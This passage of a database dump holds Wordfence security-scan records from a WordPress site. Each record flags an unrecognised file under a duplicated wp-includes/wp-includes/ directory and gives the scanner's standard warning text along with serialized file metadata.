More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/certificates/ca-bundle.crt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26701,1631424863,1631424863,'new','knownfile',75,'3260fcf02a5e2eab66cc67aa3a454db9','90d126aed86fcfaa3a22c7fcc7c2a7f8','Unknown file in WordPress core: wp-includes/wp-includes/class-IXR.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/class-IXR.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26702,1631424863,1631424863,'new','knownfile',75,'553fe877ebeb1cbf2394271e580dc08a','720547f1496bfba496aeefc1d0de703e','Unknown file in WordPress core: wp-includes/wp-includes/class-feed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-feed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26703,1631424863,1631424863,'new','knownfile',75,'fc36520122ac3eb532e672df380895c8','07730b92383f727e7c5dbfc60eb1aefc','Unknown file in WordPress core: wp-includes/wp-includes/class-http.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-http.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26704,1631424863,1631424863,'new','knownfile',75,'fa55726f075733a5d78ce6823e7c763f','c68c3e1334f54b564d4482e995cbd4db','Unknown file in WordPress core: wp-includes/wp-includes/class-json.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-json.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26705,1631424863,1631424863,'new','knownfile',75,'3d228636ad1994375ced8eb47a1c2a67','85990d87a818f77d5f66f690a0099aef','Unknown file in WordPress core: wp-includes/wp-includes/class-oembed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/class-oembed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26706,1631424863,1631424863,'new','knownfile',75,'98ed64b89e4524a461892bbe6c60e98d','26c547fe59fca428473e678629b2be2b','Unknown file in WordPress core: wp-includes/wp-includes/class-phpass.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/class-phpass.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26707,1631424863,1631424863,'new','knownfile',75,'b7a1e6403b8dfeb0bcc2a17f5a058d7c','d29e002a3c4124c334d904aeaf4878de','Unknown file in WordPress core: wp-includes/wp-includes/class-phpmailer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-phpmailer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26708,1631424863,1631424863,'new','knownfile',75,'e1b8e05171c252914d74605ef236e50f','d9bfaa8fa9c0603e0462977ebf6a6a10','Unknown file in WordPress core: wp-includes/wp-includes/class-pop3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-pop3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26709,1631424863,1631424863,'new','knownfile',75,'4b1eb5d6c89749afd0fb606fb8e587c3','34b9002f78bed63fdb664d8f5a41b8d8','Unknown file in WordPress core: wp-includes/wp-includes/class-requests.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-requests.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26710,1631424864,1631424864,'new','knownfile',75,'6252e9b0a615f1f251febc13889c4bca','3eab0b9adf0f2aecf5a9fdb2d4daf6da','Unknown file in WordPress core: wp-includes/wp-includes/class-simplepie.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-simplepie.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26711,1631424864,1631424864,'new','knownfile',75,'b88057bcf906b6c794c4b2e469cba183','f783289d8adf6afe0c522cbd96915564','Unknown file in WordPress core: wp-includes/wp-includes/class-smtp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-smtp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26712,1631424864,1631424864,'new','knownfile',75,'6f143906918af745b7aa67f3e753ea17','096076bec39178961d28ab3425e7e274','Unknown file in WordPress core: wp-includes/wp-includes/class-snoopy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/class-snoopy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26713,1631424864,1631424864,'new','knownfile',75,'d6c6ef1c4bd0d17915c64b2a6c80881b','b1e5b9cb3c257803cf24f1bb1b510d2f','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-category-dropdown.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/class-walker-category-dropdown.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26714,1631424865,1631424865,'new','knownfile',75,'d4b7f1fa824009091ca88bc8431c2d5d','ad86a6adfb0bc120ba27e5f25d531ae6','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-category.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-walker-category.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26715,1631424865,1631424865,'new','knownfile',75,'f8db36cf1f202c253cbe365909099ac7','fb0f69e631665e40c09f1bdde5a9a935','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-comment.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/class-walker-comment.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26716,1631424865,1631424865,'new','knownfile',75,'27bdf3c39551e4629005fc2c701d109f','a59e8b23af4705ad231f00defd5b915d','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-nav-menu.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-walker-nav-menu.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26717,1631424865,1631424865,'new','knownfile',75,'b37a26840312e3b3c18763705f4da3a7','2b8db5b1d57ac84b8b75e8609cbfeeae','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-page-dropdown.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-walker-page-dropdown.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26718,1631424865,1631424865,'new','knownfile',75,'746c77ca0faf6e1e2e4c12d894cdc8ad','3b486dc00b88b8ec3fac499e4516424f','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-page.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/class-walker-page.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26719,1631424865,1631424865,'new','knownfile',75,'2e66d497e28bc4b0949a77ad9ce109ec','094570aaf6eb960edd131dc70b79b86e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-admin-bar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-admin-bar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26720,1631424865,1631424865,'new','knownfile',75,'0e91757e0c8d50dbed226906331b98e1','29e22428322f9cd0bb8c194b0351691d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-ajax-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-ajax-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26721,1631424865,1631424865,'new','knownfile',75,'b419f3f1318db6a80831aac6c974b215','e309e209bd6b1f00fccc9b9dff421520','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-application-passwords.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/class-wp-application-passwords.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26722,1631424865,1631424865,'new','knownfile',75,'4d6e056decb678c880adaf6e19bd130d','d0a4707b76d96df4f3b9eb174f3088af','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-list.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-block-list.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26723,1631424865,1631424865,'new','knownfile',75,'b39d4d31c4ffcfffcc9c187b8d4e2aba','eb25f4a3edc34be447a1c473b875b321','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-parser.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-block-parser.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26724,1631424865,1631424865,'new','knownfile',75,'4857d6d22db5da4f85db2310cdea4e73','5cd8df20639b43ec92f1a34123bbb510','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-pattern-categories-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/class-wp-block-pattern-categories-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26725,1631424865,1631424865,'new','knownfile',75,'63b4fdc561efbc182162fe8e2b020aab','7144703c890fd4c618e9f4e23180c591','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-patterns-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/class-wp-block-patterns-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26726,1631424865,1631424865,'new','knownfile',75,'ade974a0a2103f178a12ef0a654048e4','b0aa9aed7abbeda7ea5edf74c8d90788','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-styles-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/class-wp-block-styles-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26727,1631424866,1631424866,'new','knownfile',75,'16ed280bccc089646b4a4f6c198c0970','f8fc843391244be220571df84d75f481','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-supports.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-block-supports.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26728,1631424866,1631424866,'new','knownfile',75,'9c6facbb93c52f153044d18bef362cb1','ea24885244c80276daff4fc01d490e2e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-type-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-block-type-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26729,1631424866,1631424866,'new','knownfile',75,'0c6107804b14cca9822b46ad36b4634a','3b2cf90046407269d9b6f8cfcb51c435','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-type.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-block-type.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26730,1631424866,1631424866,'new','knownfile',75,'bd92a448e9404a9397d668d648aa7357','427354ac098e637a83f05a7f703bfa34','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-block.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26731,1631424866,1631424866,'new','knownfile',75,'1c50c5939344b30338ffa100a1340f28','a9787116e569d78a697c4fa35a57be9d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-comment-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-comment-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26732,1631424866,1631424866,'new','knownfile',75,'f1be47743efe763230feb8fb24d89578','96bd68c4225b9e6db05cc4536c71381d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-comment.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class-wp-comment.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26733,1631424866,1631424866,'new','knownfile',75,'978c04844b2990d21e9a400ef63d0a0e','2b54342d192304c492f461ccc788ff26','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26734,1631424866,1631424866,'new','knownfile',75,'7874856bba1f7bdad0f7f86ee68f7776','af66a295159e2423772f9db7da5b7e13','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-manager.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-manager.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26735,1631424866,1631424866,'new','knownfile',75,'2eda7305fa7f7fb50c594d00ba29750c','7a23e83c13c40fa1a0d82e699b27162d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-nav-menus.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-customize-nav-menus.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26736,1631424866,1631424866,'new','knownfile',75,'a3add13a7db6f378a66ff76b7d122fdf','c68b0f65511508eaa726d2bad5262039','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-panel.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-customize-panel.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26737,1631424866,1631424866,'new','knownfile',75,'061b96cdbbde410198bb2cbd13b63efd','c39d3a9cf4f752cbb10632e63640f062','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26738,1631424866,1631424866,'new','knownfile',75,'d49e46fd12a0d78f679326b6e0668b15','5126d47178bb6189211ddac19f898205','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26739,1631424866,1631424866,'new','knownfile',75,'aab4dcd5dd041c7af4e24951ea7430db','b51152a67f77fa5958a8c0e8bddd10fd','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-widgets.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-widgets.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26740,1631424866,1631424866,'new','knownfile',75,'db5f38cbc1f2c2e2c40da422fce72526','4c4965aafc20c71bf88136dd4349b589','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-date-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-date-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26741,1631424867,1631424867,'new','knownfile',75,'bec8fd7c6aae72a3aa35ad587eaf002e','bbf363e9f0b25bdb36d333bd3e7b8af1','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-dependency.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes 